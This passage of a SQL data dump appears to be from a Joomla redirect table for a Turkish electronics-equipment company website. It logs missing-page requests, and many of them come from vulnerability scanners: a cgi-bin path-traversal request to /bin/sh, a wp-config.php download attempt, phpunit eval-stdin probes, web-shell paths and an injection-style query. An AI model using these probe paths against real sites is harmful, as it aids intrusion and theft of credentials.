00:00:00',301),(28170,'http://3s-technologies.com.tr/tr/ofc2/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2021-11-29 11:47:17','0000-00-00 00:00:00',301),(28171,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/ddm-novastar/smd-fä±rä±n/by,category_name?language=tr-tr&keyword=',NULL,'','',4,0,'2021-11-30 04:25:57','0000-00-00 00:00:00',301),(28172,'http://3s-technologies.com.tr/tr/libs/open-flash-chart/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2021-11-30 12:25:52','0000-00-00 00:00:00',301),(28173,'https://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,product_sku/results,1-50?language=en-gb',NULL,'','',2,0,'2021-11-30 17:55:11','0000-00-00 00:00:00',301),(28174,'http://3s-technologies.com.tr/tr/php-ofc-library/ofc_upload_image.php',NULL,'','',4,0,'2021-12-01 05:10:18','0000-00-00 00:00:00',301),(28175,'https://3s-technologies.com.tr/en/wood-processing-ah��ap-i��leme',NULL,'','',13,0,'2021-12-02 15:18:52','0000-00-00 00:00:00',301),(28176,'https://3s-technologies.com.tr/en/ah��ap-i��leme-wood-processing-120cm',NULL,'','',8,0,'2021-12-02 15:49:40','0000-00-00 00:00:00',301),(28177,'https://3s-technologies.com.tr/en/akrilik-i��leme-acrylic-processing',NULL,'','',8,0,'2021-12-02 15:55:12','0000-00-00 00:00:00',301),(28178,'https://3s-technologies.com.tr/en/aluminyum-i��leme-aluminum-processing',NULL,'','',7,0,'2021-12-02 16:23:56','0000-00-00 00:00:00',301),(28179,'http://3s-technologies.com.tr/mt/mt-xmlrpc.cgi',NULL,'','',5,0,'2021-12-03 01:37:08','0000-00-00 00:00:00',301),(28180,'http://3s-technologies.com.tr/tr/mt/diz.php',NULL,'','',4,0,'2021-12-03 01:37:24','0000-00-00 00:00:00',301),(28181,'http://3s-technologies.com.tr/tr/dkiz.php?dkiz',NULL,'','',4,0,'2021-12-03 01:37:28','0000-00-00 00:00:00',301),(28182,'http://3s-technologies.com.tr//mt/mt-xmlrpc.cgi',NULL,'','',2,0,'2021-12-03 01:37:30','0000-00-00 00:00:00',301),(28183,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-fä±rä±n/ly-8c-detail',NULL,'','',7,0,'2021-12-05 12:18:29','0000-00-00 00:00:00',301),(28184,'https://www.3s-technologies.com.tr/tr/?option=com_easyblog&view=dashboard&layout=write',NULL,'https://www.3s-technologies.com.tr/index.php?option=com_easyblog&view=dashboard&layout=write','',8,0,'2021-12-05 19:17:07','0000-00-00 00:00:00',301),(28185,'http://3s-technologies.com.tr/tr/libraries/gnz11/assets/js/plugins/jquery/file_upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2021-12-06 01:33:26','0000-00-00 00:00:00',301),(28186,'http://3s-technologies.com.tr/tr/libraries/gnz11/assets/js/plugins/jquery/file_upload/server/php/index_upl.php?file=tf2rghf.jpg',NULL,'','',2,0,'2021-12-06 01:33:26','0000-00-00 00:00:00',301),(28187,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/rh2-detail',NULL,'','',2,0,'2021-12-06 10:28:36','0000-00-00 00:00:00',301),(28188,'http://3s-technologies.com.tr/en/aluminyum-iåÿleme-aluminum-processing',NULL,'','',1,0,'2021-12-07 07:27:09','0000-00-00 00:00:00',301),(28189,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/avb-detail',NULL,'','',2,0,'2021-12-07 12:04:08','0000-00-00 00:00:00',301),(28190,'http://3s-technologies.com.tr/cgi-bin/mt/mt-xmlrpc.cgi',NULL,'','',3,0,'2021-12-07 22:02:26','0000-00-00 00:00:00',301),(28191,'http://3s-technologies.com.tr/cgi-bin/mt4//mt-xmlrpc.cgi',NULL,'','',1,0,'2021-12-07 22:02:28','0000-00-00 00:00:00',301),(28192,'http://3s-technologies.com.tr/mt-xmlrpc.cgi',NULL,'','',3,0,'2021-12-07 22:02:29','0000-00-00 00:00:00',301),(28193,'http://3s-technologies.com.tr/cgi-bin/mt4/mt-xmlrpc.cgi',NULL,'','',1,0,'2021-12-07 22:02:30','0000-00-00 00:00:00',301),(28194,'http://3s-technologies.com.tr/mtcgi/mt-xmlrpc.cgi',NULL,'','',3,0,'2021-12-07 22:02:31','0000-00-00 00:00:00',301),(28195,'http://3s-technologies.com.tr/blog/mt-xmlrpc.cgi',NULL,'','',2,0,'2021-12-07 22:02:33','0000-00-00 00:00:00',301),(28196,'http://3s-technologies.com.tr/ex/mt-xmlrpc.cgi',NULL,'','',1,0,'2021-12-07 22:02:33','0000-00-00 00:00:00',301),(28197,'http://3s-technologies.com.tr/tr/install.php',NULL,'','',350,0,'2021-12-07 23:38:31','0000-00-00 00:00:00',301),(28198,'http://3s-technologies.com.tr/tr/util/login.aspx',NULL,'','',2,0,'2021-12-07 23:38:31','0000-00-00 00:00:00',301),(28199,'http://3s-technologies.com.tr/tr/magento_version',NULL,'','',2,0,'2021-12-07 23:38:31','0000-00-00 00:00:00',301),(28200,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/rh6-detail',NULL,'','',2,0,'2021-12-08 02:18:02','0000-00-00 00:00:00',301),(28201,'http://3s-technologies.com.tr/en/wood-processing-ahåÿap-iåÿleme/mdf-iåÿleme-mdf-processing',NULL,'','',1,0,'2021-12-08 13:48:58','0000-00-00 00:00:00',301),(28202,'http://3s-technologies.com.tr/en/wikindex.php?f=/nmrtjoujadutreqj/scrjkuhlebpzmtyo.txt',NULL,'','',3,0,'2021-12-08 14:29:10','0000-00-00 00:00:00',301),(28203,'http://3s-technologies.com.tr/environment',NULL,'','',1,0,'2021-12-08 20:01:12','0000-00-00 00:00:00',301),(28204,'http://www.3s-technologies.com.tr/environment',NULL,'','',1,0,'2021-12-08 20:01:12','0000-00-00 00:00:00',301),(28205,'http://3s-technologies.com.tr/en/radio.php',NULL,'','',145,0,'2021-12-09 00:11:25','0000-00-00 00:00:00',301),(28206,'https://3s-technologies.com.tr/tr//administrator/index.php',NULL,'https://3s-technologies.com.tr/tr//administrator/index.php','',1067,0,'2021-12-09 07:47:30','0000-00-00 00:00:00',301),(28207,'http://3s-technologies.com.tr/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh',NULL,'','',5,0,'2021-12-09 16:52:44','0000-00-00 00:00:00',301),(28208,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-dã¼åÿã¼k-hä±zlä±/ls60v-detail/askquestion?tmpl=component',NULL,'','',3,0,'2021-12-09 21:24:38','0000-00-00 00:00:00',301),(28209,'http://3s-technologies.com.tr/tr/wp-json/wp/v2/posts',NULL,'3s-technologies.com.tr/wp-json/wp/v2/posts','',36,0,'2021-12-10 02:54:54','0000-00-00 00:00:00',301),(28210,'http://3s-technologies.com.tr/tr/myzoomsounds?action=dzsap_download&link=wp-config.php',NULL,'','',6,0,'2021-12-11 05:38:42','0000-00-00 00:00:00',301),(28211,'http://www.3s-technologies.com.tr/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh',NULL,'','',1,0,'2021-12-11 06:41:58','0000-00-00 00:00:00',301),(28212,'https://3s-technologies.com.tr/en/wood-processing-ahåÿap-iåÿleme/mdf-iåÿleme-mdf-processing',NULL,'','',1,0,'2021-12-12 10:33:35','0000-00-00 00:00:00',301),(28213,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/tolo/smd-fä±rä±n/by,product_sku?language=tr-tr&keyword=',NULL,'','',4,0,'2021-12-13 01:49:20','0000-00-00 00:00:00',301),(28214,'http://3s-technologies.com.tr/en/components/com_jevents/jevents.php',NULL,'','',1,0,'2021-12-16 13:26:48','0000-00-00 00:00:00',301),(28215,'http://3s-technologies.com.tr/en/components/com_hotornot2/hotornot2.php',NULL,'','',1,0,'2021-12-17 08:16:54','0000-00-00 00:00:00',301),(28216,'http://3s-technologies.com.tr/tr/public/assets/plugins/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',5,0,'2021-12-17 10:49:47','0000-00-00 00:00:00',301),(28217,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/components/com_hotornot2/hotornot2.php',NULL,'','',1,0,'2021-12-17 19:30:18','0000-00-00 00:00:00',301),(28218,'http://3s-technologies.com.tr/en/components/com_resources/controller.php',NULL,'','',1,0,'2021-12-18 06:47:54','0000-00-00 00:00:00',301),(28219,'http://3s-technologies.com.tr//components/com_b2jcontact/css/b2jcontact.css',NULL,'','',1,0,'2021-12-18 16:41:19','0000-00-00 00:00:00',301),(28220,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/components/com_resources/controller.php',NULL,'','',1,0,'2021-12-18 19:26:14','0000-00-00 00:00:00',301),(28221,'http://3s-technologies.com.tr/tr/modules/mod_artuploader/upload.php',NULL,'','',2,0,'2021-12-19 01:40:23','0000-00-00 00:00:00',301),(28222,'https://3s-technologies.com.tr/tr/?option=com_fabrik&c=import&view=import',NULL,'','',2,0,'2021-12-19 01:58:46','0000-00-00 00:00:00',301),(28223,'http://3s-technologies.com.tr/tr/components/com_supergroups/uploadvideo/upload.php',NULL,'','',2,0,'2021-12-19 08:25:59','0000-00-00 00:00:00',301),(28224,'http://3s-technologies.com.tr/en/wp-includes/wp-atom.php',NULL,'www.google.com','',19,0,'2021-12-19 15:22:05','0000-00-00 00:00:00',301),(28225,'https://3s-technologies.com.tr/en/wp-includes/wp-atom.php',NULL,'www.google.com','',4,0,'2021-12-19 15:22:24','0000-00-00 00:00:00',301),(28226,'http://3s-technologies.com.tr/en/wp',NULL,'www.google.com','',46,0,'2021-12-19 16:33:18','0000-00-00 00:00:00',301),(28227,'http://3s-technologies.com.tr/en/wordpress',NULL,'www.google.com','',54,0,'2021-12-19 16:33:22','0000-00-00 00:00:00',301),(28228,'http://3s-technologies.com.tr/en/shop',NULL,'www.google.com','',29,0,'2021-12-19 16:33:38','0000-00-00 00:00:00',301),(28229,'http://3s-technologies.com.tr/en/store',NULL,'www.google.com','',14,0,'2021-12-19 16:33:41','0000-00-00 00:00:00',301),(28230,'http://3s-technologies.com.tr/en/forum',NULL,'www.google.com','',14,0,'2021-12-19 16:33:46','0000-00-00 00:00:00',301),(28231,'http://3s-technologies.com.tr/en/new',NULL,'www.google.com','',28,0,'2021-12-19 16:34:19','0000-00-00 00:00:00',301),(28232,'http://3s-technologies.com.tr/en/old',NULL,'www.google.com','',19,0,'2021-12-19 16:34:23','0000-00-00 00:00:00',301),(28233,'http://3s-technologies.com.tr/en/demo',NULL,'www.google.com','',17,0,'2021-12-19 16:34:28','0000-00-00 00:00:00',301),(28234,'http://3s-technologies.com.tr/en/backup',NULL,'www.google.com','',33,0,'2021-12-19 16:34:35','0000-00-00 00:00:00',301),(28235,'http://3s-technologies.com.tr/en/test',NULL,'www.google.com','',20,0,'2021-12-19 16:34:49','0000-00-00 00:00:00',301),(28236,'http://3s-technologies.com.tr/en/home',NULL,'www.google.com','',8,0,'2021-12-19 16:34:53','0000-00-00 00:00:00',301),(28237,'http://3s-technologies.com.tr/en/2020',NULL,'www.google.com','',7,0,'2021-12-19 16:34:57','0000-00-00 00:00:00',301),(28238,'http://3s-technologies.com.tr/en/2019',NULL,'www.google.com','',7,0,'2021-12-19 16:35:03','0000-00-00 00:00:00',301),(28239,'http://3s-technologies.com.tr/en/site',NULL,'www.google.com','',29,0,'2021-12-19 16:35:08','0000-00-00 00:00:00',301),(28240,'http://3s-technologies.com.tr/en/2018',NULL,'www.google.com','',7,0,'2021-12-19 16:35:12','0000-00-00 00:00:00',301),(28241,'http://3s-technologies.com.tr/en/2017',NULL,'www.google.com','',7,0,'2021-12-19 16:35:16','0000-00-00 00:00:00',301),(28242,'http://3s-technologies.com.tr/en/2016',NULL,'www.google.com','',7,0,'2021-12-19 16:35:19','0000-00-00 00:00:00',301),(28243,'http://3s-technologies.com.tr/en/2015',NULL,'www.google.com','',7,0,'2021-12-19 16:35:25','0000-00-00 00:00:00',301),(28244,'http://3s-technologies.com.tr/en/2014',NULL,'www.google.com','',7,0,'2021-12-19 16:35:29','0000-00-00 00:00:00',301),(28245,'http://3s-technologies.com.tr/en/2013',NULL,'www.google.com','',7,0,'2021-12-19 16:35:33','0000-00-00 00:00:00',301),(28246,'http://3s-technologies.com.tr/en/2012',NULL,'www.google.com','',6,0,'2021-12-19 16:35:38','0000-00-00 00:00:00',301),(28247,'http://3s-technologies.com.tr/en/2010',NULL,'www.google.com','',6,0,'2021-12-19 16:35:41','0000-00-00 00:00:00',301),(28248,'http://3s-technologies.com.tr/en/2009',NULL,'www.google.com','',6,0,'2021-12-19 16:35:45','0000-00-00 00:00:00',301),(28249,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/components/com_jaggyblog/controller.php',NULL,'','',1,0,'2021-12-19 23:46:42','0000-00-00 00:00:00',301),(28250,'http://3s-technologies.com.tr/en/components/com_registrationpro/controller.php',NULL,'','',1,0,'2021-12-20 09:08:22','0000-00-00 00:00:00',301),(28251,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/components/com_registrationpro/controller.php',NULL,'','',1,0,'2021-12-20 21:02:21','0000-00-00 00:00:00',301),(28252,'http://3s-technologies.com.tr//vuln.php',NULL,'','',1,0,'2021-12-21 02:53:49','0000-00-00 00:00:00',301),(28253,'http://3s-technologies.com.tr//images/vuln.php',NULL,'','',1,0,'2021-12-21 02:53:56','0000-00-00 00:00:00',301),(28254,'http://3s-technologies.com.tr//wp-content/vuln.php',NULL,'','',1,0,'2021-12-21 02:54:04','0000-00-00 00:00:00',301),(28255,'http://3s-technologies.com.tr//ups.php',NULL,'','',1,0,'2021-12-21 02:54:11','0000-00-00 00:00:00',301),(28256,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/components/com_jumi/jumi.php',NULL,'','',1,0,'2021-12-23 04:47:58','0000-00-00 00:00:00',301),(28257,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/jvk-detail',NULL,'','',3,0,'2021-12-23 05:12:38','0000-00-00 00:00:00',301),(28258,'http://3s-technologies.com.tr/tr/public/assets/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',4,0,'2021-12-23 14:49:28','0000-00-00 00:00:00',301),(28259,'http://3s-technologies.com.tr/en/components/com_fabrik/controller.php',NULL,'','',1,0,'2021-12-23 18:04:58','0000-00-00 00:00:00',301),(28260,'http://3s-technologies.com.tr/tr/style.php',NULL,'','',212,0,'2021-12-24 00:16:29','0000-00-00 00:00:00',301),(28261,'https://3s-technologies.com.tr/tr/vendor/phpunit/phpunit/src/util/php/evil.php',NULL,'','',1,0,'2021-12-24 00:58:31','0000-00-00 00:00:00',301),(28262,'https://3s-technologies.com.tr/tr/app/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2021-12-24 00:58:32','0000-00-00 00:00:00',301),(28263,'https://3s-technologies.com.tr/tr/app/vendor/phpunit/phpunit/src/util/php/evil.php',NULL,'','',1,0,'2021-12-24 00:58:35','0000-00-00 00:00:00',301),(28264,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/components/com_fabrik/controller.php',NULL,'','',1,0,'2021-12-24 08:11:04','0000-00-00 00:00:00',301),(28265,'http://3s-technologies.com.tr/en/components/com_chronocontact/libraries/chronoform.php',NULL,'','',1,0,'2021-12-24 20:02:04','0000-00-00 00:00:00',301),(28266,'http://www.3s-technologies.com.tr/tr/akrilik-iåÿleme-acrylic-processing/akrilik-iåÿleme-acrylic-processing',NULL,'','',3,0,'2021-12-25 02:54:33','0000-00-00 00:00:00',301),(28267,'http://3s-technologies.com.tr/tr/public/assets/global/plugins/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',5,0,'2021-12-25 07:47:23','0000-00-00 00:00:00',301),(28268,'https://3s-technologies.com.tr/en/system.paths',NULL,'','',39,0,'2021-12-25 09:16:04','0000-00-00 00:00:00',301),(28269,'https://3s-technologies.com.tr/en/img.caption',NULL,'','',37,0,'2021-12-25 09:16:14','0000-00-00 00:00:00',301),(28270,'https://3s-technologies.com.tr/en/).parents(',NULL,'','',37,0,'2021-12-25 09:16:23','0000-00-00 00:00:00',301),(28271,'https://3s-technologies.com.tr/en/csrf.token',NULL,'','',38,0,'2021-12-25 09:16:25','0000-00-00 00:00:00',301),(28272,'https://3s-technologies.com.tr/en/).addclass(',NULL,'','',37,0,'2021-12-25 09:16:34','0000-00-00 00:00:00',301),(28273,'https://3s-technologies.com.tr/en/).removeclass(',NULL,'','',37,0,'2021-12-25 09:16:37','0000-00-00 00:00:00',301),(28274,'https://3s-technologies.com.tr/en/).delay(500).slideup(500,',NULL,'','',35,0,'2021-12-25 09:17:03','0000-00-00 00:00:00',301),(28275,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/components/com_chronocontact/libraries/chronoform.php',NULL,'','',4,0,'2021-12-26 02:34:52','0000-00-00 00:00:00',301),(28276,'http://3s-technologies.com.tr/en/components/com_dtregister/controller.php',NULL,'','',1,0,'2021-12-26 16:09:00','0000-00-00 00:00:00',301),(28277,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturers/panasonic',NULL,'','',4,0,'2021-12-26 18:19:23','0000-00-00 00:00:00',301),(28278,'http://3s-technologies.com.tr/tr/public/plugins/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',4,0,'2021-12-27 05:18:50','0000-00-00 00:00:00',301),(28279,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/components/com_dtregister/controller.php',NULL,'','',1,0,'2021-12-27 07:47:13','0000-00-00 00:00:00',301),(28280,'http://3s-technologies.com.tr/en/components/com_hwdvideoshare/controller.php',NULL,'','',1,0,'2021-12-27 21:37:24','0000-00-00 00:00:00',301),(28281,'http://3s-technologies.com.tr/tr/demo/server/php/index.php',NULL,'','',3,0,'2021-12-28 16:40:14','0000-00-00 00:00:00',301),(28282,'http://3s-technologies.com.tr/en/components/com_orgchart/controller.php',NULL,'','',1,0,'2021-12-28 21:44:26','0000-00-00 00:00:00',301),(28283,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/media/mod_languages/css/template.css?5eb4b2b5291a818dbcdf17723c481f5e',NULL,'','',1,0,'2021-12-29 03:39:06','0000-00-00 00:00:00',301),(28284,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/templates/beez5/css/vmsite-ltr.css?vmver=1ca80efd',NULL,'','',1,0,'2021-12-29 03:39:35','0000-00-00 00:00:00',301),(28285,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/components/com_orgchart/controller.php',NULL,'','',1,0,'2021-12-29 08:15:33','0000-00-00 00:00:00',301),(28286,'http://3s-technologies.com.tr/en/components/com_jombib/jombib.html.php',NULL,'','',1,0,'2021-12-29 19:20:53','0000-00-00 00:00:00',301),(28287,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/components/com_jombib/jombib.html.php',NULL,'','',1,0,'2021-12-30 06:57:00','0000-00-00 00:00:00',301),(28288,'https://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/by,ordering/results,1-5?language=tr-tr&filter_product=',NULL,'','',1,0,'2022-01-03 11:48:04','0000-00-00 00:00:00',301),(28289,'http://3s-technologies.com.tr/tr/server/php/index.php?file=tf2rghf.jpg',NULL,'','',10,0,'2022-01-04 09:27:06','0000-00-00 00:00:00',301),(28290,'http://3s-technologies.com.tr/dist/app.js',NULL,'','',1,0,'2022-01-05 14:03:00','0000-00-00 00:00:00',301),(28291,'https://3s-technologies.com.tr/dist/app.js',NULL,'','',1,0,'2022-01-05 14:03:00','0000-00-00 00:00:00',301),(28292,'http://3s-technologies.com.tr/alfa_data/alfacgiapi/perl.alfa',NULL,'www.google.com','',34,0,'2022-01-05 19:47:59','0000-00-00 00:00:00',301),(28293,'http://3s-technologies.com.tr/alfacgiapi/perl.alfa',NULL,'www.google.com','',34,0,'2022-01-05 19:48:14','0000-00-00 00:00:00',301),(28294,'http://3s-technologies.com.tr/tr/file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',2,0,'2022-01-06 04:16:12','0000-00-00 00:00:00',301),(28295,'https://www.3s-technologies.com.tr/en/wood-processing-ahåÿap-iåÿleme/mdf-iåÿleme-mdf-processing',NULL,'','',5,0,'2022-01-06 04:55:30','0000-00-00 00:00:00',301),(28296,'https://3s-technologies.com.tr/tr/templates/beez5/images/icon_external_link.gif',NULL,'https://3s-technologies.com.tr/tr/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2','',6,0,'2022-01-06 09:52:04','0000-00-00 00:00:00',301),(28297,'https://3s-technologies.com.tr/tr/chosen-sprite@2x.png',NULL,'https://3s-technologies.com.tr/tr/iletisim','',2,0,'2022-01-06 09:52:52','0000-00-00 00:00:00',301),(28298,'https://3s-technologies.com.tr/tr/images/box1.png',NULL,'https://3s-technologies.com.tr/tr/iletisim','',2,0,'2022-01-06 09:52:52','0000-00-00 00:00:00',301),(28299,'https://3s-technologies.com.tr/tr/images/loader.gif',NULL,'https://3s-technologies.com.tr/tr/iletisim','',2,0,'2022-01-06 09:52:54','0000-00-00 00:00:00',301),(28300,'https://3s-technologies.com.tr/tr/images/header_outer.jpg',NULL,'https://3s-technologies.com.tr/tr/iletisim','',2,0,'2022-01-06 09:52:54','0000-00-00 00:00:00',301),(28301,'https://3s-technologies.com.tr/tr/images/tabs_back.png',NULL,'https://3s-technologies.com.tr/tr/iletisim','',2,0,'2022-01-06 09:52:54','0000-00-00 00:00:00',301),(28302,'https://3s-technologies.com.tr/tr/images/karo.gif',NULL,'https://3s-technologies.com.tr/tr/iletisim','',2,0,'2022-01-06 09:52:54','0000-00-00 00:00:00',301),(28303,'https://3s-technologies.com.tr/tr/images/arrow1.gif',NULL,'https://3s-technologies.com.tr/tr/iletisim','',2,0,'2022-01-06 09:52:54','0000-00-00 00:00:00',301),(28304,'https://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim',NULL,'','',4,0,'2022-01-07 09:15:25','0000-00-00 00:00:00',301),(28305,'http://3s-technologies.com.tr/en/contacts/trackback/',NULL,'','',2,0,'2022-01-07 16:09:43','0000-00-00 00:00:00',301),(28306,'http://3s-technologies.com.tr/tr/themes/assets/plugins/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-01-08 03:55:22','0000-00-00 00:00:00',301),(28307,'http://3s-technologies.com.tr/tr/assets/vendor/server/php/index.php?file=tf2rghf.jpg',NULL,'','',2,0,'2022-01-08 13:53:56','0000-00-00 00:00:00',301),(28308,'http://3s-technologies.com.tr/tr/shop',NULL,'http://3s-technologies.com.tr/SHOP','',111,0,'2022-01-08 20:48:03','0000-00-00 00:00:00',301),(28309,'http://3s-technologies.com.tr/.well-known/alfa_data/alfacgiapi/perl.alfa',NULL,'www.google.com','',1,0,'2022-01-09 11:13:11','0000-00-00 00:00:00',301),(28310,'http://3s-technologies.com.tr/.well-known/alfacgiapi/perl.alfa',NULL,'www.google.com','',1,0,'2022-01-09 11:13:25','0000-00-00 00:00:00',301),(28311,'http://3s-technologies.com.tr/.well-known/acme-challenge/alfa_data/alfacgiapi/perl.alfa',NULL,'www.google.com','',1,0,'2022-01-09 11:14:28','0000-00-00 00:00:00',301),(28312,'http://3s-technologies.com.tr/.well-known/acme-challenge/alfacgiapi/perl.alfa',NULL,'www.google.com','',1,0,'2022-01-09 11:14:41','0000-00-00 00:00:00',301),(28313,'http://3s-technologies.com.tr/wp-content/uploads/alfa_data/alfacgiapi/perl.alfa',NULL,'www.google.com','',1,0,'2022-01-09 11:14:58','0000-00-00 00:00:00',301),(28314,'http://3s-technologies.com.tr/wp-content/uploads/alfacgiapi/perl.alfa',NULL,'www.google.com','',1,0,'2022-01-09 11:15:09','0000-00-00 00:00:00',301),(28315,'http://3s-technologies.com.tr/wp-includes/alfa_data/alfacgiapi/perl.alfa',NULL,'www.google.com','',1,0,'2022-01-09 11:15:21','0000-00-00 00:00:00',301),(28316,'http://3s-technologies.com.tr/wp-includes/alfacgiapi/perl.alfa',NULL,'www.google.com','',1,0,'2022-01-09 11:15:32','0000-00-00 00:00:00',301),(28317,'http://3s-technologies.com.tr/media/com_acym/',NULL,'','',1,0,'2022-01-12 01:09:39','0000-00-00 00:00:00',301),(28318,'http://3s-technologies.com.tr/en/crossdomain.xml',NULL,'','',3,0,'2022-01-12 06:46:32','0000-00-00 00:00:00',301),(28319,'http://www.3s-technologies.com.tr/en/crossdomain.xml',NULL,'','',2,0,'2022-01-12 06:47:44','0000-00-00 00:00:00',301),(28320,'https://3s-technologies.com.tr/en/crossdomain.xml',NULL,'','',2,0,'2022-01-12 06:48:34','0000-00-00 00:00:00',301),(28321,'https://www.3s-technologies.com.tr/en/crossdomain.xml',NULL,'','',2,0,'2022-01-12 06:50:06','0000-00-00 00:00:00',301),(28322,'https://3s-technologies.com.tr/en/test',NULL,'','',1,0,'2022-01-12 06:53:39','0000-00-00 00:00:00',301),(28323,'http://www.3s-technologies.com.tr/en/test',NULL,'','',2,0,'2022-01-12 06:54:42','0000-00-00 00:00:00',301),(28324,'https://www.3s-technologies.com.tr/en/test',NULL,'','',3,0,'2022-01-12 06:55:00','0000-00-00 00:00:00',301),(28325,'https://3s-technologies.com.tr/tr/test_404_page',NULL,'','',22,0,'2022-01-14 06:54:57','0000-00-00 00:00:00',301),(28326,'https://3s-technologies.com.tr/tr/administrator/manifests/files/joomla.xml',NULL,'','',23,0,'2022-01-14 06:54:58','0000-00-00 00:00:00',301),(28327,'https://3s-technologies.com.tr/tr/?option=com_acym&ctrl=frontmails&task=setnewiconshare',NULL,'http://www.google.com/','',9,0,'2022-01-14 12:03:53','0000-00-00 00:00:00',301),(28328,'http://3s-technologies.com.tr/en/imam_bro.gif',NULL,'bing.com','',1,0,'2022-01-16 05:23:38','0000-00-00 00:00:00',301),(28329,'http://3s-technologies.com.tr/en/images/imam_bro.gif',NULL,'bing.com','',1,0,'2022-01-16 05:23:40','0000-00-00 00:00:00',301),(28330,'https://3s-technologies.com.tr/tr/��r��nler',NULL,'','',9,0,'2022-01-16 17:12:13','0000-00-00 00:00:00',301),(28331,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/?option=com_content\'[0]&view=article&id=75:tel-lehim&catid=39:lehimleme&itemid=84',NULL,'','',2,0,'2022-01-20 01:40:21','0000-00-00 00:00:00',301),(28332,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/?option=com_content&view=article\'[0]&id=75:tel-lehim&catid=39:lehimleme&itemid=84',NULL,'','',2,0,'2022-01-20 01:40:30','0000-00-00 00:00:00',301),(28333,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/jv131-detail?tmpl=component&print=1',NULL,'','',2,0,'2022-01-22 19:11:31','0000-00-00 00:00:00',301),(28334,'https://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/av132-detail',NULL,'https://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/av132-detail','',2,0,'2022-01-23 02:12:07','0000-00-00 00:00:00',301),(28335,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/temizleme-makineleri/by,product_sku?language=tr-tr&keyword=',NULL,'','',4,0,'2022-01-23 15:17:56','0000-00-00 00:00:00',301),(28336,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-fä±rä±n/by,mf_name?language=tr-tr&keyword=',NULL,'','',3,0,'2022-01-24 09:39:21','0000-00-00 00:00:00',301),(28337,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/thru-hole/rg131-detail/askquestion?tmpl=component',NULL,'','',1,0,'2022-01-24 13:40:44','0000-00-00 00:00:00',301),(28338,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-33-34-detail',NULL,'','',2,0,'2022-01-25 22:46:57','0000-00-00 00:00:00',301),(28339,'https://3s-technologies.com.tr/tr/?option=com_arttcym&ctrl=frontmails&task=setnewiconshare',NULL,'','',1,0,'2022-01-26 07:44:46','0000-00-00 00:00:00',301),(28340,'http://3s-technologies.com.tr/tr/components/com_jbusinessdirectory/assets/uploadfile.php',NULL,'','',6,0,'2022-01-26 09:20:39','0000-00-00 00:00:00',301),(28341,'http://3s-technologies.com.tr/tr/media/com_acym/upload/socials/',NULL,'','',1,0,'2022-01-26 11:23:57','0000-00-00 00:00:00',301),(28342,'http://3s-technologies.com.tr/tr/media/com_acym/upload/socials',NULL,'','',1,0,'2022-01-26 11:39:07','0000-00-00 00:00:00',301),(28343,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/trident-detail?tmpl=component&print=1',NULL,'','',2,0,'2022-01-26 18:38:12','0000-00-00 00:00:00',301),(28344,'http://3s-technologies.com.tr/tr/administrator/components/com_jclassifiedsmanager/helpers/upload.php',NULL,'','',5,0,'2022-01-27 04:35:03','0000-00-00 00:00:00',301),(28345,'http://3s-technologies.com.tr/tr/new-index.php',NULL,'','',29,0,'2022-01-27 04:38:52','0000-00-00 00:00:00',301),(28346,'http://3s-technologies.com.tr/tr/sindex.php',NULL,'','',22,0,'2022-01-27 04:39:03','0000-00-00 00:00:00',301),(28347,'http://3s-technologies.com.tr/tr/baindex.php',NULL,'','',22,0,'2022-01-27 04:39:11','0000-00-00 00:00:00',301),(28348,'http://3s-technologies.com.tr/tr/wikindex.php',NULL,'','',80,0,'2022-01-27 04:39:15','0000-00-00 00:00:00',301),(28349,'http://3s-technologies.com.tr/tr/components/com_acym/controllers/index.html',NULL,'','',6,0,'2022-01-27 06:11:28','0000-00-00 